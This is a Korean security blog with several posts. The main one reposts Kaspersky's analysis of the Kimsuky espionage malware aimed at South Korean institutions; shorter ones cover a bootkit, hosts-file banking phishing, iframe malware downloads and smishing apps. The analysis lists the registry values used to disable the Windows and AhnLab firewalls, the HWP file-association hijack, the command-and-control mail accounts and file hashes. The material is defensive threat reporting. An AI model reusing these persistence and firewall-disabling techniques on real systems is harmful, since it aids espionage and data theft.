블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


세계적인 러시아 보안회사 카스퍼스키(Kaspersky)가 한국 정부 및 정치기관, 연구소, 기업, 국방관련인원등 한국의 주요기관을
대상으로 한 북한발 APT 공격(Kimsuky Operation)에 대한 분석 리포트를 공개하였다.

초기 징후는 2013년 4월 3일이며, Trojan.Win32.Kimsuky 샘플은 2013년 5월 5일에 최초 발견되었다고 한다.

관련 된 정보는 아래와 같다.

국내 보안업체도 맞추지 못한 퍼즐을 외국 보안업체가 했다는것이 놀랍기도 하고,
한편으로는 조금 창피한 것도 사실이다.

좀 더 파일 하나하나 자세하게 살펴보고 싶은마은은 굴뚝같지만, 파일이 어디 한두개인가 ㅠㅠ
아쉽지만 마음속에만 반성하고 이 포스팅을 이어가자!!

이번 APT공격(Kimsuky Operation)의 주요 증상은 아래와 같다.

- 키로깅 (사용자 정보 수집)
- 디렉토리/파일 목록 수집 (PC드라이버 정보 및 파일리스트, 시스템정보 수집)
- 한글(HWP) 문서 탈취 (모든 HWP 한글파일 수집)
- 원격 제어 모듈 다운로드 및 수행 (TeamViewer 프로그램 변조 및 악성파일 다운로드)
- 원격 제어 연결

좀더 상세한 분석보고서는 아래 카스퍼스키 블로그에서 확인 할 수 있다

- [분석 리포트] 북한인의 대한민국 내 주요 기관을 대상으로 한 APT 공격의 결정적 징후
원본링크 : http://www.kaspersky.co.kr/board/bbs/board.php?bo_table=News&wr_id=789

지난 몇 달 동안 우리는 대한민국의 주요 기관을 대상으로 한 사이버 스파이 활동을 모니터링 해 왔으며, 이 스파이 활동은 지금까지도 진행 중입니다. 이 스파이 활동이 계획과 실행에 있어서 주목할만하다고 생각되는 몇 가지 이유가 있습니다. 어느 날 우리는 무료 메일서버를 통해 "마스터"와 통신하는 다소 단순한 스파이 프로그램을 발견하였습니다.
 
그렇지만, 우리의 주목을 끄는 몇 가지 흥미로운 점이 있었습니다.
 
• 불가리아 무료 이메일 서버인 mail.bg가 사용되었다. 
• 컴파일 경로에 한글이 포함되어 있다.

한글이 사용되었고 불가리아 이메일을 명령-제어 통신에 사용한다는 두 가지 사실이 우리에게 해당 악성코드를 좀 더 자세히
분석해야 할 필요가 있음을 알려 주었습니다.

다음과 같이 악성코드 내에 포함된 절대 경로에 한글이 포함되어 있습니다.


D:\rsh\공격\UAC_dll(완성)\Release\test.pdb


"rsh"은 "Remote Shell"의 약자로 추측됩니다.
 
피해자의 대부분을 정확히 알 수는 없었지만, 우리는 몇몇 대상을 식별할 수 있었으며, 이 활동에 의해 감염이 확인된 몇몇 기관은 다음과 같습니다; 세종연구소, 국방연구원, 통일부, 현대상선
 
아울러 몇몇 단서는 "통일을 생각하는 사람들의 모임((http://www.unihope.kr/)"의 컴퓨터들이 이 공격에 효과적으로 대응을 하지
못했다는 것 또한 알려주고 있습니다. 이외의 다른 기관들도 공격 대상이 되었는데, 총 피해 기관 중 11개는 대한민국이고 2개는
중국이었습니다.
 
이 공격은 매우 제한적이며 소수의 기관을 대상으로 하고 있기 때문에, 우리는 이 악성코드의 배포 경로를 확인할 수 없었으며, 
모니터링을 시작하면서 우리가 발견한 이 악성코드 샘플은 대부분 피싱 이메일을 통해 배포되는 초창기 악성코드 형태를 가지고
있었습니다.
 
 시스템 감염 방법

최초 구동 프로그램은 실제 악성코드를 로딩하기 위한 DLL입니다. 그것은 익스포트된 상태를 유지하지 않고, 간단히 자신의 리소스 섹션에 다른 암호화된 라이브러리를 전달하는 역할을 하는데, 이 두 번째 라이브러리가 모든 스파이 기능을 수행합니다.
 
윈도우7에서 동작할 때, 악성 라이브러리는 explorer.exe에 악성코드를 인젝션시키기 위해 Metasploit Framework의 오픈 소스
코드인 Win7Elevate를 재사용합니다. 윈도우7이건 아니건, 이 악성코드는 리소스로부터 자신의 스파이 라이브러리를 복호화하여 디스크에 임의의 이름으로 저장합니다. 예를 들어, 사용자의 임시 폴더에 ~DFE8B437DD7C417A6D.TMP 파일 등으로 저장된 후 라이브러리로서 로드됩니다.
 
다음 단계에서 이 라이브러리는 KBDLV2.DLL 또는 AUTO.DLL 등의 이름으로 System32 폴더에 복사됩니다. 다음으로 dll을 서비스하기 위한 서비스가 생성되는데, DriverManage, WebService 및 WebClientManager 등의 이름이 사용됨을 알 수 있었습니다.
이렇게 함으로써 시스템 재부팅 시 백신 등의 보안 프로그램이 동작하지 않는 경우 악성코드가 지속적으로 실행되는 것을 보장받게 됩니다.
 
이 단계에서 악성코드는 감염된 컴퓨터에 대한 정보를 수집하는데, systeminfo 명령어를 실행시킨 후 출력되는 정보를C:\Program Files\Common Files\System\Ole DB\oledvbs.inc파일에 저장하는 행위 등이 포함됩니다. 또한 컴퓨터 이름과 사용자 이름을 포함하는 스트링을 생성하기 위한 다른 함수가 호출되는데, 이는 어디에서도 실제로 사용되지 않기 때문에 악성코드 제작자의 실수인 것으로 보여집니다. 이 단계는 감염된 시스템이 처음 동작할 때 오직 한번만 실행되며, 시스템이 시작될 때, svchost.exe 프로세스에 의해 악성코드 라이브러리가 로딩된 후 스파이 활동을 수행하게 됩니다.
 
 
 
스파이 모듈

이 활동에는 다수의 악성코드가 동원되지만, 전략적으로 그들은 모두 하나의 스파이 기능을 위해 구현되었습니다. 이 활동에서
마스터와 통신을 담당하는 기본 라이브러리(KBDLV2.DLL / AUTO.DLL) 이외에, 우리는 다음의 기능을 수행하는 모듈을 발견할 수 있었습니다;
 
• 키스트록 로깅
• 디렉토리/파일 목록 수집
• HWP 문서 탈취
• 원격 제어 모듈 다운로드 및 수행 
• 원격 제어 연결
 
 
방화벽 무력화

시스템이 시작할 때, 기본 라이브러리는 다음과 같이 레지스트리 내 관련 값을 0으로 만들어서 시스템 방화벽과 안랩의 방화벽을
무력화합니다;

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
    EnableFirewall = 0
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
    EnableFirewall = 0
HKLM\SOFTWARE\AhnLab\V3IS2007\InternetSec
    FWRunMode = 0
HKLM\SOFTWARE\Ahnlab\V3IS80\is
    fwmode = 0
 
또한, 무력화된 방화벽에 대해 사용자에게 경고하는 것을 막기 위해 윈도우 보안센터 서비스를 끕니다.
 
악성코드 제작자가 안랩의 보안 제품을 선택하여 무력화하는 것은 결코 우연이 아닙니다. Winnti 연구 기간 동안인 2011년에 SK 컴즈 사고를 자세히 살펴보면 (http://www.securelist.com/en/analysis/204792287/Winnti_More_than_just_a_game 참조), 이 회사가 외국계 보안제품을 사용했다는 이유로 대한민국의 당국자에게 심각하게 비판을 받았음을 알 수 있습니다. 우리는 이러한 비판이 대한민국 기업에 어떠한 영향을 주었는지 알 수 없지만, 많은 대한민국 기업들이 안랩의 보안 제품을 사용하고 있다는 것은 알고 있습니다.
 
이런 이유로, 공격자들은 오로지 대한민국만을 그들의 목표로 삼았기 때문에 외국계 회사의 제품을 무력화하기 위한 시도를 하지 않은 것입니다.
 
한번 악성코드가 안랩 방화벽을 무력화하면, taskmgr.exe 파일이 하드코딩된 C:\WINDOWS\ 폴더에 존재하는지를 확인한 후 이를 실행합니다. 이 후, 악성코드는 매 30분마다 자신에게 보고를 반복하면서 명령을 기다립니다.
 
 
통신

봇과 공격자 사이의 통신은 불가리아의 무료 이메일 서버인 mail.bg를 이용합니다. 봇은 이메일 계정에 대한 하드코딩된 인증 정보를 포함하고 있으며, 인증 절차를 통과한 후, 악성코드는 또 다른 지정된 이메일 주소로 이메일을 전송하고 수신함의 이메일을 읽어 들입니다. 이들 모든 활동은 시스템의 Wininet API 함수를 사용한 mail.bg 웹-인터페이스를 통해 수행됩니다. 우리가 입수한 모든 샘플로부터 본 활동에 이용된 다음과 같은 이메일 계정을 추출할 수 있었습니다;
 
beautifl@mail.bg
ennemyman@mail.bg
fasionman@mail.bg
happylove@mail.bg
lovest000@mail.bg
monneyman@mail.bg
sportsman@mail.bg
veryhappy@mail.bg

위에서 언급한 mail.bg 계정 이외에 봇이 사용한 두 개의 이메일 주소가 아래에 있는데, 이 이메일 주소를 이용하여 감염된 시스템의 정보와 상태를 첨부 파일로 보고합니다.
 
iop110112@hotmail.com
rsh1213@hotmail.com
 
 
통상적인 보고

감염 상태를 보고하기 위해 악성코드는 systeminfo 명령어의 출력 내용을 보관하고 있는  C:\Program Files\Common Files\System\Ole DB\oledvbs.inc 파일을 읽어 들이는데, 만약 해당 파일이 존재하면 읽은 후 삭제합니다.
 
다음으로, 동일한 폴더 내 sqlxmlx.inc 파일로부터 사용자 관련 정보를 읽습니다(우리는 코드 내에 "UserID" 해설 부분을 볼 수 있습니다). 그러나 이 파일은 결코 생성되지 않으며, 단지 이러한 데이터를 수집하고sqlxmlx.inc 파일에 저장하는 함수가 존재할 뿐입니다. 그렇지만, 첫 번째 실행 단계에서 수집된 사용자 정보는 “xmlrwbin.inc” 에 저장되기 때문에, 악성코드 제작자가 실수로 다른
파일에 사용자 정보를 저장하도록 봇을 코딩했을 가능성이 높습니다. 우리는 사용자 정보가 저장될 sqlxmlx.inc가 생성되지
않는다는 것을 알고 있습니다. 그러나 만약 그 파일이 존재한다면, 악성코드는 그 파일을 읽고 지울 것입니다. 이러한 엉성함은
악성코드가 급히 만들어졌거나, 아마추어에 의해 제작되었음을 나타낼 수 있습니다.
 
다음으로, 가로챈 키스트록을 파일로부터 읽어 마스터로 전송합니다. 키스트록은 일반적이고 일관된 형식(어떤 키가 눌려졌는지와 함께 키보드 자판의 실제 시퀀스)으로 파일에 저장되어 보관됩니다. 이 데이터는 외부 키로거 모듈이 생성한 C:\Program Files\Common Files\System\Ole DB\msolui80.inc 파일에서 찾을 수 있습니다.
 
이 모든 데이터는 하나의xmlrwbin.inc 파일로 합쳐져서 RC4로 암호화됩니다. RC4의 키는 임의로 생성된 75h 바이트 버퍼의  MD5 해시로 생성됩니다. 데이터의 복호화를 위해서는, 공격자는 MD5 해시값이나 버퍼의 모든 내용을 정확히 알아야 합니다. 이 데이터 또한 RSA로 암호화되어 전송됩니다. 악성코드는 1120 비트의 공개키를 생성하고 이를 75h 바이트 버퍼를 암호화하는데 사용합니다. 다음으로 다소 특이한 크기와 방법으로 전송될 모든 데이터를 0x80 바이트 버퍼에 담아 연결하는데, 결과 데이터는C:\Program Files\Common Files\System\Ole DB\ 경로에 다음 형식을 따르는 이름으로 저장합니다;
 
"[system time]_[account at Bulgarian email server].txt", 예를 들면, "08191757_beautifl@mail.bg.txt".

해당 파일은 이후에 이메일에 첨부되어 마스터의 이메일 계정으로 전송되며, 전송 후에는 피해 시스템에서 즉시 삭제됩니다. 
 
 
마스터로부터의 데이터 수신

악성코드는 또한 메일 서버로부터 명령을 가져오는데, 특정 제목이 붙은 불가리아 이메일 계정의 메일을 체크합니다. 우리는 이와 관련한 몇몇 제목 테크를 확인하였습니다: Down_0, Down_1, Happy_0 and ddd_3 . 첨부파일이 있는 이메일을 발견하면, 악성코드는 해당 첨부파일을 다운로드하여C:\Program Files\Common Files\System\Ole DB폴더에 “msdaipp.cnt”  파일로 저장합니다. 공격자는 이 같은 방법으로 추가적인 실행코드를 전송할 수 있습니다. 실행파일은 RC4로 암호화된 후 첨부되며, 복호화에 사용될 키는 악성 코드 샘플에 하드코딩되어 있습니다. 모든 알려진 샘플에 동일한 “rsh!@!#” 문자열이 포함되어 있고 이를 RC4 키를 생성하는데 이용한다는 점이 매우 흥미롭습니다. 앞서 설명한 바와 같이, 악성코드는 이 문자열의 MD5를 계산한 후, 실행코드를 복호화하기 위한 RC4로 해시하는데 사용합니다. 다음으로, 복호화된 실행코드를 “sqlsoldb.exe” 이름으로 디스크에 저장한 후 실행하고, “taskmgr.exe”로 이름이 변경됩니다. 이후 오리지날 이메일과 첨부파일은 불가리아 이메일 수신함에서 삭제됩니다.
 

키로거

추가적인 키로거 모듈은 크게 흥미롭지 않습니다-- 간단하게 키스트록을 가로채어 눌려진 키를 C:\Program Files\Common Files\System\Ole DB\msolui80.inc 파일에 저장하며, 사용자가 키를 눌렀을 때의 활성 윈도우 이름도 기록합니다. 우리는 이와 동일한 형태를 Madi 악성코드에서도 볼 수 있습니다. (http://www.kaspersky.com/about/news/virus/2012/kaspersky_lab_and_seculert_announce_madi_a_newly_discovered_cyber_espionage_campaign_in_the_middle_east 참조) 키스트록을 C:\WINDOWS\setup.log 에 기록하는 키로거 변형도 존재합니다.
 
 
디렉토리/파일 목록 수집기

감염 시스템으로 전송되는 다음 프로그램은 시스템의 모든 드라이브에 대하여 다음의 명령어를 실행합니다; 

dir [drive letter]: /a /s /t /-c

실제로, 이 명령어는C:\WINDOWS\msdatt.bat 파일로 기록되며, 화면 출력이 C:\WINDOWS\msdatl3.inc 파일에 저장됩니다.
결과적으로, 저장된 파일은 드라이브의 모든 폴더에 있는 모든 파일의 목록을 담고 있기 때문에, 악성코드는 나중에 그 데이터를
읽어서C:\Program Files\Common Files\System\Ole DB\oledvbs.inc 파일 내용에 추가합니다. 이 시점에서, “oledvbs.inc “ 는
이미systeminfo 출력을 저장하고 있습니다.
 
 
 
HWP 문서 탈취

이 모듈은 감염된 컴퓨터에서 HWP 문서를 가로챕니다. HWP 파일 형식은 MS Word 문서와 유사하지만, 아래아 한글에 의해서 지원되며 한컴오피스의 번들인 한글워드프로세서로서 대한민국에서 매우 폭넓게 사용됩니다. 이 악성코드 모듈은 다른 모듈과는
독립적으로 동작하며, 자신만의 불가리아 이메일 계정을 가지고 있는데, 계정은 가로챈 문서를 전송하는 마스터의 전자메일과 함께 모듈 내에 하드코딩되어 있습니다. 모듈이 감염된 컴퓨터의 모든 HWP 파일을 검색하지 않고 사용자가 오픈한 문서에만 반응하여 탈취한다는 점이 흥미롭습니다.  이 같은 특징은 문서 탈취 모듈에서는 매우 특이한 점이며, 다른 악성코드 툴킷에서는 볼 수 없는 특징입니다.
 
프로그램은 자신을 [Hangul full path]\HncReporter.exe로 복사하고 HWP 문서를 오픈하는데 사용되는 기본 프로그램으로
레지스트리 관련 정보를 수정합니다.
 
HKEY_CLASSES_ROOT\Hwp.Document.7\shell\open\command
또는
HKEY_CLASSES_ROOT\Hwp.Document.8\shell\open\command

기본적으로 .HWP 파일의 연결 프로그램은 "Hwp.exe"로 지정되어 있는데, 레지스트리 내 관련 정보는 "[Hangul full path]\Hwp.exe" "%1" 와 같습니다. 그러나 악성코드는 이 정보를 "[Hangul full path]\HncReporter.exe" "%1" 로 수정합니다. 따라서, 사용자가 임의의 .HWP 문서를 오픈할 때, 악성코드 프로그램 자신이 .HWP 문서를 오픈하기 위해 실행됩니다. 이는 레지스트리를 수정했기 때문에 가능합니다. HWP 문서가 읽혀지면 "Hwp"라는 제목의 이메일 첨부파일로 공격자에게 전달됩니다. 전송 후 악성코드는 사용자가 요청한 .HWP 문서를 실제 아래아 한글 워드프로세서인 "Hwp.exe"를 실행함으로써 오픈하게 됩니다. 이는, 피해자 대부분이 .hwp 파일이 탈취되었음을 알 수 없다는 것을 의미합니다. 모듈의 전송 루틴은C:\Program Files\Common Files\System\Ole DB 폴더
내 다음의 파일에 따라 달라집니다: xmlrwbin.inc, msdaipp.cnt, msdapml.cnt, msdaerr.cnt, msdmeng.cnt and oledjvs.inc
 
 
원격 제어 모듈 다운로더

나머지 프로그램은 특정 제목으로 수신된 이메일의 첨부 파일을 다운로드하기 위한 용도입니다. 이 프로그램은 주(pivot) 모듈과
유사하지만, 하드코딩된 불가리아 이메일 계정, 로그인, 수신 이메일 읽기 및 "Team"이라는 제목 태그 검색 등으로 기능이 축소되었습니다. 이러한 이메일이 발견되면 첨부 파일을 로드하여 하드디스크 내C:\Program Files\Common Files\System\Ole DB\taskmgr.exe 파일로 저장하고 실행시킵니다. 이 경우는 실행 파일이 암호화 없이 전달됩니다.
 
 
원격 제어 모듈

악성코드 제작자가 백도어 프로그램을 스스로 제작한 것이 아니라는 점 또한 흥미롭습니다. 대신에, 제작자는TeamViewer client version 5.0.9104을 수정하였는데, 공격자에 의해 이메일로 전달된 원격 제어 모듈 관련 실행파일은 3개의 실행파일로 구성되어
있습니다. 그 중 두개는 팀뷰어 컴포넌트이고 나머지는 몇 종류의 백도어 로더입니다. 드로퍼는 다음과 같은 세 개의 파일을C:\Windows\System32 디렉토리에 생성합니다;

      netsvcs.exe – 수정된 팀뷰어 클라이언트 
      netsvcs_ko.dll – 팀뷰어 클라이언트의 리소스 라이브러리
      vcmon.exe – 설치기/실행기

이 후  “Remote Access Service” 서비스를 생성하여, 시스템이 부팅될 때C:\Windows\System32\vcmon.exe가 실행되도록 합니다. vcmon.exe가 실행될 때마다, 다음과 같이 레지스트리 관련 값을 0으로 만들어 안랩의 방화벽을 무력화합니다;

HKLM\SOFTWARE\AhnLab\V3 365 Clinic\InternetSec
      UseFw = 0
      UseIps = 0

다음으로, 팀뷰어 관련 레지스트리 설정을 수정합니다. 이미 언급한 바와 같이, 이 활동에 사용되는 팀뷰어 컴퍼넌트는 오리지날
버전이 아니라   수정된 버전입니다. 우리는 모두 두 가지의 변형된 버전을 발견했습니다. 악성코드 제작자는 팀뷰어 컴퍼넌트
내 모든 “Teamviewer” 문자열을 바꾸는데, 첫 번째 경우는“Goldstager” 문자열이고 두 번째는“Coinstager” 문자열이 사용됩니다. 팀뷰어 클라이언트 레지스트리 설정을 다음과 같습니다; HKLM\Software\Goldstager\Version5 및 HKLM\Software\Coinstager\Version5

실행기는 원격 접근 도구가 어떻게 동작할 지와 관련한 몇몇 레지스트리 값을 설정합니다. 그 중 하나가 SecurityPasswordAES입니다. 이 파라미터는 팀뷰어 클라이언트에 접근해야 하는 원격 사용자 패스워드의 해시를 나타냅니다. 이 방법으로 공격자는 이미 공유된 인증 정보를 설정하고, 이후에 스타터가 팀뷰어 클라이언트 netsvcs.exe를 실행합니다.
 
 
Kim (김)
드롭박스 메일 계정 iop110112@hotmail.com와  rsh1213@hotmail.com가 "kim"으로 시작하는 "kimsukyang" 과 "Kim asdfa"라는 이름으로 등록되어 있다는 것은 매우 흥미롭습니다.
 
물론 우리는 이것이 공격자의 실제 이름인지는 확신할 수 없습니다. 그렇지만, 이렇게 선택한 경우는 흔하지 않기 때문에, 아마도
공격의 시작이 북한인임을 나타냅니다. 피해자의 프로파일을 살펴보면 - 대한민국 내 국제협력 관련 연구기관, 국방 정책 연구기관, 대형 해운사, 통일 지원 단체 - 인 것으로 보아 공격자가 북한인일 것이라 추측합니다.
 
공격 대상은 완벽하게 공격자의 관심 거리입니다. 한편으로, 임의의 등록 정보를 입력하여 공격자에 대한 잘못된 조사를 유도하는 것은 그리 어렵지 않습니다. 가짜 등록 정보를 만들고 Hotmail 등록에 "kimsukyang"을 사용하는데 어떤 비용도 들지 않기 때문입니다. 우리는 이 등록 정보가 공격자에 대한 확실하고 명백한 정보를 제공하지 않는다고 인정합니다.
 
그렇지만, 우리는 나중에 공격자의 소스 IP 주소에 관심을 가졌습니다. 총 10개의 IP 주소가 존재하였으며,
이들 모두 중국의 지린성 및 랴오닝성의 IP 주소입니다.
 
 
공격자의 활동 영역과 관련된 다른 IP 주소 영역은 발견되지 않았습니다. 아울러 이들 지역에서 인터넷 접근을 제공한 ISP 들은
북한과 회선을 유지하고 있다는 소문도 있습니다. 결국, 이러한 지리적 위치는 북한인이 대한민국 내 주요 기관을 대상으로 한 공격의 책임이 있다는 이론을 뒷받침하고 있습니다.
 
 
부록

관련 모듈의 MD5:

주 모듈 드로퍼:

0x173c1528dc6364c44e887a6c9bd3e07c
0x191d2da5da0e37a3bb3cbca830a405ff
0x5eef25dc875cfcb441b993f7de8c9805
0xb20c5db37bda0db8eb1af8fc6e51e703
0xface9e96058d8fe9750d26dd1dd35876

주 모듈:

0x45448a53ec3db51818f57396be41f34f
0x4a1ac739cd2ca21ad656eaade01a3182
0x637e0c6d18b4238ca3f85bcaec191291
0x80cba157c1cd8ea205007ce7b64e0c2a
0xb3caca978b75badffd965a88e08246b0
0xdbedadc1663abff34ea4bdc3a4e03f70

키 로거:

0x3ae894917b1d8e4833688571a0573de4
0x8a85bd84c4d779bf62ff257d1d5ab88b
0xf1389f2151dc35f05901aba4e5e473c7

디렉토리/파일 목록 수집:

0x3baaf1a873304d2d607dbedf47d3e2b4
0x3195202066f026de3abfe2f966c9b304

HWP 문서 탈취기:

0xd0af6b8bdc4766d1393722d2e67a657b

원격 제어 모듈 다운로더:

0x9f7faf77b1a2918ddf6b1ef344ae199d
Remote control bundle dropper:
0x96280f3f9fd8bdbe60a23fa621b85ab6

원격 제어 모듈 로더:

0x122c523a383034a5baef2362cad53d57
0x2a0b18fa0887bb014a344dc336ccdc8c

수정된 팀뷰어 클라이언트 및 리소스 라이브러리:

0xab73b1395938c48d62b7eeb5c9f3409d
0x69930320259ea525844d910a58285e15

카스퍼스키랩 안티바이러스는 수정된 팀뷰어 클라이언트 이외의 악성코드를 Trojan.Win32.Kimsuky, 수정된 팀뷰어 클라이언트 컴포넌트를 Trojan.Win32.Patched.ps 로 진단합니다.


해당 악성파일들을 알약에서는 아래와 같이 탐지한다.
(Backdoor.Agent.77824.C, Spyware.Infostealer.36864.A, Trojan.Agent.102400.A, Trojan.Agent.162304, Trojan.Agent.ntmsvcs,
 
Trojan.Agent.HncReporter,  Trojan.Agent.Tader, Trojan.Downloader.77824, Trojan.Dropper.Agent.77824.C, 
 
Trojan.Keylogger.36864)



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


2011년 10월경 국내 사용자를 대상으로 아두스카 부트킷(Aduska Bootkit)이 유포 된 적이 있었는데, 그 때 이후 처음보는듯 하다.

관련 링크는 아래와 같다.

아두스카 부트킷(Aduska Bootkit)은 MBR(Master Boot Record)을 변조하여 악의적인 행위를 하는 부트킷으로써 동유럽 지역에
유포가 다수 되었으나, 국내에는 많이 보이지는 않는 악성코드이다. 

최초 유포지는 확인 할 수 없었지만, 지인을 통해 아래의 서버에서 다운로드 된 파일이 이번 아두스카 부트킷의 메인 드롭퍼임을
확인 할 수 있었다. 

hxxp://korea******.com/bbs/icon/win7.exe (메인 드롭퍼)
ㄴhxxp://korea******.com/bbs/icon/taba.exe (아두스카 부트킷 생성 파일)

 


이번에 발견 된 아두스카 부트킷이 포함 된 악성코드의 주요 악성행위로는 아래와 같다.

- 마스터 부트 레코드(MBR) 변조
 
- 사용자 정보 외부 유출
 
- 보안 프로그램 종료
 
- 추가 악성파일 다운로드
 
- 온라인게임 정보 외부유출
  (dnf.exe, MapleStory.exe, lin.bin, ff2client.exe, Game.exe, heroes.exe, ExLauncher.exe, TERA.exe, PCOTP.exe,    
   AION.bin)






아두스카 부트킷(Aduska Bootkit)으로 감염 된 MBR(Master Boot Record)은 아래의 전용백신에서 치료가 가능하다.


알약에서는 해당 파일을 Trojan.Rookit.Aduska, Trojan.Downloader.MBR.2560 으로 탐지한다.



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.



호스트(Hosts, Hosts.ics) 파일 변조를 통해 국내 인터넷 뱅킹(우리은행, 외환은행, 기업은행, 신한은행, 시티은행, 새마을금고, 농협) 

피싱 사이트들이 기승을 부리고 있는 가운데, 최근에는 포털사이트를 이용하여 인터넷 뱅킹 피싱 사이트로 이동시키는 악성파일들이 

확인되고 있다.


아래의 그림을 보면 국내 인터넷 뱅킹 주소앞에 국내 포털 사이트인 네이버(Naver), 다음(Daum)가 포함되어 있는 것을 볼 수 있다.



감염 된 PC에서 네이버에 접속 할 경우 아래와 같은 팝업창이 사용자에게 보여지며, 사용자가 그림 아래 인터넷뱅킹을 클릭 하게 되면 

제작자가 미리 만들어둔 피싱 사이트로 이동하게 된다.



알약에서는 현재 버전인 2.5.0.1(공개용)에서는 "Hosts 파일 보호" 기능이 추가되었기 때문에 "환경설정에서 설정해 주면 된다.



호스트 파일 보호 기능이 Off 되어있더라도 변조 된 Hosts 파일은 "호스트파일변조"로 탐지하오니

항상 실시간검사를 On으로 해두길 바랍니다.



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여 

접속 된 PC가  취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.


하지만 이번에 확인 된 변조사이트는 취약점으로 인한 감염이 아니라 iframe 태그에 악성파일(exe) 주소를 직접 넣어 

사용자가 다운로드 받을 수 있게 변조되는 사이트들이 늘어 나고 있다.


이렇게 되면 사용자PC에 취약점이 존재하지 않더라도, 사용자의 클릭으로 감염 시킬 수 있는 장점이 생긴다.

(물론 강제 설치가 아니기 때문에, 감염 속도에는 조금 느리겠지만 ㅎㅎㅎ)


요게 원래는 5월 말정도에 나온 내용이였는데 ㅠㅠ 이제야 포스트를 하게 된다.

암튼, 중요한 사항은 이게 아니라 ㅎㅎㅎ


아래의 그림을 보면 알겠지만, 코드는 아주 심플하다.

그냥 exe 주소만을 iframe 태그를 사용하여 삽입시켜두었다.






해당 변조 사이트에 접속 시 아래와 같이 브라우저에 다운로드 창이 생성이 되니, 사용자가 조금만 주의하면 방지할 수 있습니다.



해당 파일을 설치할 시에는 안티바이러스를 종료시키고, 특정 서버에 접속하여 오퍼의 명령을 받게 됩니다.



알약에서는 해당 파일을 Backdoor.Agent.PC 로 탐지하오니 실시간 감시를 항상 On으로 켜두시기 바랍니다^^


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.





국내 보안업체인 [잉카 인터넷]에서 스미싱을 통한 소액결제사기가 기승을 부리면서 이를 차단할 수 있는 무료 애플리케이션(앱)이 

새롭게 공개됐다.


이는 안드로이드 기반 스마트폰 보안위협 원천차단 방지 기술을 적용해 스미싱 전용 차단 솔루션인 "뭐야 이 문자" 어플리케이션이다.


스미싱 문자메시지의 경우 정상적으로 탐지하지 못하거나 스미싱이 아닌 일반 문자메시지를 포괄적으로 탐지하는 사례가 많은데,

잉카에서는 "특히 탐지를 우회하기 위해 악용되는 'URL Obfuscation' 기법과 'Multi URL Shortener' 등에 대한 분석기능까지 탑재하고

있다"고 한다.


앱이 실행된 상태에서 악성 문자를 수신하면 이를 탐지했다는 경고창과 함께 "삭제·신고", "허용" 등을 선택을 할 수 있다. 


또한 신고 버튼을 누르면 잉카인터넷 대응팀은 물론 한국인터넷진흥원(KISA) 등 유관기관에 악성 문자가 공유되며, 유포지 서버 확인 

등의 목적으로 활용된다.


다운로드는 아래의 링크에서 받으면 되며, 스미싱으로 고생하는 분들은 한번 설치해보시기 바랍니다.


- 구글 플레이 사이트https://play.google.com/store/apps/details?id=com.nprotect.antismishing

[뭐야 이 문자] 앱은 (주)잉카인터넷에서 제공하는 무료 서비스입니다.


* 주요 기능
1. 메시지(SMS, MMS) 스미싱 의심 내용 탐지
2. 스미싱 악성앱 탐지

* 스미싱(Smishing)
SMS, MMS를 이용한 새로운 휴대폰 해킹 기법으로 웹사이트 링크가 포함된 메시지를 보내 휴대폰 사용자가 링크를 클릭하면 안드로이드 악성 앱이 설치되어 범죄자가 휴대폰 통제 및 개인 정보를 수집할 수 있게 함

(주)잉카인터넷에서는 국내외에서 유포된 수십만종 이상의 안드로이드 악성앱을 수집하여 대응 중에 있으며, 스미싱(Smishing) 전용 차단솔루션을 개발완료하여 일반에 무료로 제공하며, 이를 통해 스미싱으로 인한 피해를 최소화할 수 있을 것으로 기대된다.

감사합니다.

[관련 키워드]
스미싱, smishing, 해킹, 스마트폰, 보안, 문자, 피싱, 피씽, 쓰미싱, 스미씽, sms, 뭐야,nProtect,잉카,인터넷, inca, 악성, 예방, 뱅킹, 폰, 좀비, 모바일, 디도스,dos,결제,앱,사기,방지,사생활,mms,백신,도청,원격,돈,피해,개인정보,메세지통,소액,v3,추적,알약,T가드,올레,sk,카카오톡,멜론,보안앱,쿠키런,트랙,안드로이드,갤럭시,옵티머스,G,실시간,감시,추천,gps,겔럭시,어플,보안관,개인, 스미싱 해킹 보안 문자 sms 뭐야 nProtect 악성 예방 뱅킹 DDoS 결제 앱 사기 방지 mms 도청 피해 소액 실시간 감시 추천 어플

-(주)잉카인터넷-



 

 


블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.



최근 알약 안드로이드 어플리케이션의 설치를 유도하는 스미싱 문자 중 음성통화를 수집하는 악성어플이 확인되고 있다.

이외에도 많은 스미싱 문자들이 발견되고 있으니 안드로이드 사용자는 꼭 확인 된 마켓에서 어플리케이션을 설치하고,
보안 프로그램을 설치하여  미연에 스미싱에 대한 피해를 방지하길 바란다.
 


알약 홈페이지 공지사항 : http://alyac.altools.co.kr/SecurityCenter/Analysis/NoticeView.aspx?id=205

안녕하세요 알약대응팀입니다.


음성통화 및 문자(SMS)내역을 탈취하는 악성앱이 발견되어 스마트폰 사용자들의 주의가 요구되고있습니다.


해당 악성앱은 60,000원이 소액 결제 되었다는 거짓내용의 스미싱 문자(SMS)를 사용자에게 보내, 문자에 포함된 단축URL을
사용자가 클릭하게 하여 유포되는 스미싱 공격 방법을 사용하고 있습니다. 

악성앱이 설치되면 사용자 스마트폰에서 음성통화 내용을 녹음하고 수신된 문자(SMS) 정보를 수집하여 공격자에게 전달하는 기능을 수행하게 됩니다. 또한 자기자신이 구 버전일 경우 최신 버전으로 자동 업데이트 하는 기능도 포함하고 있습니다. 

 

음성통화 및 문자(SMS) 정보를 공격자에게 전달하는 악성행위를 하는 앱은 기존에 이미 존재하는 형태의 앱이지만 이번에 발견 된 악성앱은 스미싱 기법을 활용하고 있다는 점이 특징입니다.  특히 공격자가 감염된 스마트폰으로 문자(SMS)를 보내 악성행위를 수행하는 명령을 내릴 수 있다는 것도 주목 할 만한 부분입니다.


